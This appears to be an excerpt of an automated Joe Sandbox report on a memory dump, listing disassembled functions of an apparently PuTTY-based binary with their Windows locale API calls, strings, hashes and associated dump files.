Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

EnumSystemLocalesW.KERNEL32(00CF903E,00000001,?,?,?,00CF8A7D,?), ref: 00CF902A

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ff680b9285823604f88bc7b537e825f4a69032042a1f11dcdd458c0eca31362c
Instruction ID: 99993a16c8b83d80a86197fda00ce8677a152b631eee5a9a8a09069eb6d01741
Opcode Fuzzy Hash: ff680b9285823604f88bc7b537e825f4a69032042a1f11dcdd458c0eca31362c
Instruction Fuzzy Hash: E4F0AB3A30020897CF04AF35D845B7ABF90EFC1B50F174069EB05CB250DA729943CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2E77 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00CEC2E5,?,20001004,00000000,00000002,?,?,00CEB1F8), ref: 00CF2EAB

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b32a782c3427e5bf00996e4cef7dad089e26e760d6f4af527f01e051576ef79e
Instruction ID: 78a23f7819a6e49ae56e1f4b45c94cb678457d66768f5f42f239701ca0baec56
Opcode Fuzzy Hash: b32a782c3427e5bf00996e4cef7dad089e26e760d6f4af527f01e051576ef79e
Instruction Fuzzy Hash: B6E04F3550025CBBCF522F61EC04BAE3F16EF44761F504011FE05A5261CB718A20AAE6

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF970 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c, xrefs: 00CAF9A4

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c
API String ID: 0-3306003128
Opcode ID: 0487c350b0388ff32646c21f160538e2ba2120e9c450bbadfb3c7513bd7d7db4
Instruction ID: c2b77a4bdab371fd00a74d2aec43825be0e45ee67844b12cddfe641f210e24b4
Opcode Fuzzy Hash: 0487c350b0388ff32646c21f160538e2ba2120e9c450bbadfb3c7513bd7d7db4
Instruction Fuzzy Hash: 2131C276A0830A9FD314DE90D84076AB3A6FBCA308F19843CDD995B341E772FD069B95

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF850 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c, xrefs: 00CAF885

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/crypto/mpint.c
API String ID: 0-3306003128
Opcode ID: 7e72b1b92a92c71c94fdbc90f8d38f58d22782873306f1cc007cfeb33bcef537
Instruction ID: f510f96fe5f635132f90184d47d2a78f43953d5fb487db134b6c0ded0b3370ca
Opcode Fuzzy Hash: 7e72b1b92a92c71c94fdbc90f8d38f58d22782873306f1cc007cfeb33bcef537
Instruction Fuzzy Hash: 9C31B676A0430A9FD310DEA0D88072AB3A5FBC6318F19847DE9995B341E775ED068B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3790 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

file format error, xrefs: 00CA3792

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: file format error
API String ID: 0-2250856019
Opcode ID: 387c07769721d32d990437689fb793021ec221d92e1820a5d5a2f6334dd2883d
Instruction ID: 59fbaf99108821c94e2d1b0986e1ed2434eef141f39e309523c152d2579949e2
Opcode Fuzzy Hash: 387c07769721d32d990437689fb793021ec221d92e1820a5d5a2f6334dd2883d
Instruction Fuzzy Hash: 98F059F564829D0FD738695C68952B3F376B75331CE28103BF095C2280C6079F8A8256

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD770 Relevance: .9, Instructions: 859COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2d0734947055704cdfe7d54bf8a3df0cc3e2e7c628da723240298f4e5b72f8f
Instruction ID: 9cfbfc3480245f7a63c4677492c67f5f7ebfd423538976f32a31a6bfb1c00187
Opcode Fuzzy Hash: d2d0734947055704cdfe7d54bf8a3df0cc3e2e7c628da723240298f4e5b72f8f
Instruction Fuzzy Hash: 228227759053198FC320DF4DC880615FBE5FF88328F6AC4AD95989FB12D6B2E9578B80

Uniqueness

Uniqueness Score: -1.00%

Function 00CD4330 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd0dd37a6e08a91477984398ad642de4c1febfb5781686618baf793d93d2267
Instruction ID: 0d43db4713182134ab39b3c4035acd373216c8c6e2298d48710a6a885d1abcc8
Opcode Fuzzy Hash: 6bd0dd37a6e08a91477984398ad642de4c1febfb5781686618baf793d93d2267
Instruction Fuzzy Hash: 24926EB5A097408FD368CF29C580B9BFBE2BBC8314F55892EE999C7351D770A8448F52

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B280 Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
Instruction ID: c92de0f17becde01e2d4decd41872ecda8340369755a78537c9a2bad85688a47
Opcode Fuzzy Hash: 7f2804403c51e157750d2287fcde7dd57b8ed0e5a056311132beea16f5df39e9
Instruction Fuzzy Hash: BA322874600A05CFCB28CF19C094B6AB7E1FF88324F55866DE96A4B3A5D731ED54CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A520 Relevance: .5, Instructions: 526COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764a698017c6f65b537bd75e40da92c9781e744e754f47fa6fb4680ee3ea6c61
Instruction ID: e520b083ee8a7d6c54f6101db425f00ef07a9b23c50e422a50bd8aa899eafe8c
Opcode Fuzzy Hash: 764a698017c6f65b537bd75e40da92c9781e744e754f47fa6fb4680ee3ea6c61
Instruction Fuzzy Hash: BE32D2B4604705CFC728CF1AC580A5ABBF1BF88714F158A6DE8AA8B751D730E944CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FDB0 Relevance: .5, Instructions: 516COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20687775acaff83c7167303d2115fdb794e9489a0d35bba920a98a1ce6974a2
Instruction ID: 0d1479e887cd4702a7f2f4e55521ef5fc3521d4d442c77e6552e78e04d580371
Opcode Fuzzy Hash: a20687775acaff83c7167303d2115fdb794e9489a0d35bba920a98a1ce6974a2
Instruction Fuzzy Hash: 6402AE75A083419FD724CF28C881BABB7E1EF89311F14882DE99987391E735E949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C56260 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16427bfafe00d9f96a1ba9ff6fb81a91ddd458a1f21232873f602775e003b027
Instruction ID: e2dc74d3f36de05378f543345c2d63ed6b9d964b676aa5bdb59662d02f7e961f
Opcode Fuzzy Hash: 16427bfafe00d9f96a1ba9ff6fb81a91ddd458a1f21232873f602775e003b027
Instruction Fuzzy Hash: E3D1C179A083019FCB18CF24C4907AAB7E1AF94315F95882CEC9A57341D770EDD9CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA6D0 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f46fb93899b8e0532226ce9720ebe30658f7c586c463b9d4d59ba0f67403317
Instruction ID: 57c67a135337f07f188c48ff8b3d258450a01652bc1ceea1aa331a224e3595b7
Opcode Fuzzy Hash: 1f46fb93899b8e0532226ce9720ebe30658f7c586c463b9d4d59ba0f67403317
Instruction Fuzzy Hash: 8C91F972A047119FD7209E28CC8175AB7E1EFC5324F09862CE8A9973D2E775ED45CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD4E0 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87517cf532147a0588d1479391c340a8a8f0771fb5df46e20344306be2cd8382
Instruction ID: ead4b5d0408d67fb1747c10205686a600dc1b563d728665206c299a82f841dd6
Opcode Fuzzy Hash: 87517cf532147a0588d1479391c340a8a8f0771fb5df46e20344306be2cd8382
Instruction Fuzzy Hash: 4251C5B490430867D630EA10DC46FDBB3A8FB95309F518C3CE585932C3EA75A61ADB96

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F9B0 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8dd25cc5d380742f5400dc5c09b5b85af438ec5d5c26ba7e8502b64941985a
Instruction ID: 94f2010e24a5f69d83e74f0de8e4e915752b069815ce75d9fd1c89d23cc4be02
Opcode Fuzzy Hash: dc8dd25cc5d380742f5400dc5c09b5b85af438ec5d5c26ba7e8502b64941985a
Instruction Fuzzy Hash: C0418D72A083018FC710CE18D4C465AB7E6FFDA314F6A846DE5885B242D372E956CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6A9B Relevance: .2, Instructions: 158COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82f4562c825d87db9937be0d784f959c9f6ed46b2b441a05cc9ce24cb6843e9
Instruction ID: adbce15da9df6dbd88836b70043e3a74d418a99a83d31058c97fec9b6306195d
Opcode Fuzzy Hash: b82f4562c825d87db9937be0d784f959c9f6ed46b2b441a05cc9ce24cb6843e9
Instruction Fuzzy Hash: A5518371E00159EFDF14CF9AC941AEEBBB2EF98354F19806DE815AB201C734AE50DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CA98F0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f75bfb6a5ddaf25dc7e6f65a198da53d4c5d53998e42a954547b0e4f2b213168
Instruction ID: 4bdf8e20e65bec212c1eb335fae2304d3f6ebcaf6369e40c859889ee477fa4de
Opcode Fuzzy Hash: f75bfb6a5ddaf25dc7e6f65a198da53d4c5d53998e42a954547b0e4f2b213168
Instruction Fuzzy Hash: 1931FE32F042219BD7209D7988C025AB3D6EBC9364F5A873CE9BA973D1CA70AC1186C1

Uniqueness

Uniqueness Score: -1.00%

Function 00CDF3F0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 11fd949b93f67dffbec0f3e526fef86af11dd973f62c17bed6c356a44ad458c6
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5D11577724008243D604CA2DD8B46BBE395FBDA32076C837FC3A38B748C662EB479600

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FCD0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c8ce6318f5bde8ce58e6dadfb53bce3ac7b651e27a40228728395390379385
Instruction ID: 9808121fb9c1ea86b7c3a7bb30704079389c0a63c007423627f6b6d80453beaa
Opcode Fuzzy Hash: d2c8ce6318f5bde8ce58e6dadfb53bce3ac7b651e27a40228728395390379385
Instruction Fuzzy Hash: 84210472E043006BD7219E14CC85B6BBBE1BFC9328F09883CE9AD57251E672DD46D782

Uniqueness

Uniqueness Score: -1.00%

Function 00C8D200 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfe77c092c01cf4833e3e4b0ae526a26616bcca12bb007c0ab9493327d608891
Instruction ID: 7a2ad00395df96c6c347b38d21499a231d9bdf5b6d7a4fd3014ffac3d41ea00a
Opcode Fuzzy Hash: dfe77c092c01cf4833e3e4b0ae526a26616bcca12bb007c0ab9493327d608891
Instruction Fuzzy Hash: 11116DB16006018FD724DF7CD990A66BBE5FF993287158B2DE9A68B3C4D630F804C754

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9090 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b49b1295778ce9f2eb9a3912326190fcff8765324f50de36fa673b09c7e64b8d
Instruction ID: 58e2d813d9cec7d0d8873b1cbc6987f9df4f5fab4d0204da19471f090a3a28d4
Opcode Fuzzy Hash: b49b1295778ce9f2eb9a3912326190fcff8765324f50de36fa673b09c7e64b8d
Instruction Fuzzy Hash: 96F046B2A407062FD3205E64EC82B52F7E4EBA2355F048028E98897381E571A844C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F550 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8039fd14d24ab3b4a4f4dcf2ccdb6a0061bd5e119015cd398a55f9f0582259a2
Instruction ID: 8693e9248a9c358677660b7498ae78a5b63f4969c1552822ba1ee730fad68f72
Opcode Fuzzy Hash: 8039fd14d24ab3b4a4f4dcf2ccdb6a0061bd5e119015cd398a55f9f0582259a2
Instruction Fuzzy Hash: 60F044B69002009FD761AE34EC42A17B7B5EF45318F098838E45E57672F732F919DA62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF6424 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
